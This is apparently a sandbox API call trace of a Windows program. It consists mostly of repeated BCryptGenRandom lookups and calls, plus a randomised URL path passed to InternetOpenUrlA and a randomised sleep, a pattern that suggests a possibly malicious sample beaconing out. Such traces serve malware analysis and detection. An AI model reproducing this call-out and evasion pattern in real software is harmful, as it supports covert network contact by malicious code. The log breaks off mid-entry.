GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.614] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.614] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.614] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.614] GetProcessHeap () returned 0x440000 [0190.614] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0190.615] lstrcpyA (in: lpString1=0x472b10, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0190.615] lstrcatA (in: lpString1="\x81\x03", lpString2="/07fagryoji8p3safg/nq7z8ZBg4T0t3holo1tyioRhwjbtt5Vzr/" | out: lpString1="\x81\x03/07fagryoji8p3safg/nq7z8ZBg4T0t3holo1tyioRhwjbtt5Vzr/") returned="\x81\x03/07fagryoji8p3safg/nq7z8ZBg4T0t3holo1tyioRhwjbtt5Vzr/" [0190.615] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0190.784] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/07fagryoji8p3safg/nq7z8ZBg4T0t3holo1tyioRhwjbtt5Vzr/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0190.784] GetProcessHeap () returned 0x440000 [0190.784] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 [0190.784] GetProcessHeap () returned 0x440000 [0190.784] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b720 | out: hHeap=0x440000) returned 1 [0190.784] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0190.785] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0190.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0190.785] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0190.785] Sleep (dwMilliseconds=0x19f48) [0190.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0190.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0190.945] GetProcessHeap () returned 0x440000 [0190.945] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d6300 [0190.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0190.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d6301, cbBuffer=0x27, dwFlags=0x2 | out: pbBuffer=0x4d6301) returned 0x0 [0190.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.947] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.947] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.947] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0190.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d6328, cbBuffer=0x29, dwFlags=0x2 | out: pbBuffer=0x4d6328) returned 0x0 [0190.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0190.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.959] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.959] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.959] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.960] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.960] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.960] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.961] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.961] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.961] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.961] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.962] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.962] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.962] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.962] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.963] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.963] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.963] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0190.963] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.964] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.964] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.964] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.964] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.965] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0190.965] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d6351, cbBuffer=0x1d, dwFlags=0x2 | out: pbBuffer=0x4d6351) returned 0x0 [0190.965] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.966] GetProcAddress (hModule=0x7ffc5bcc0000, 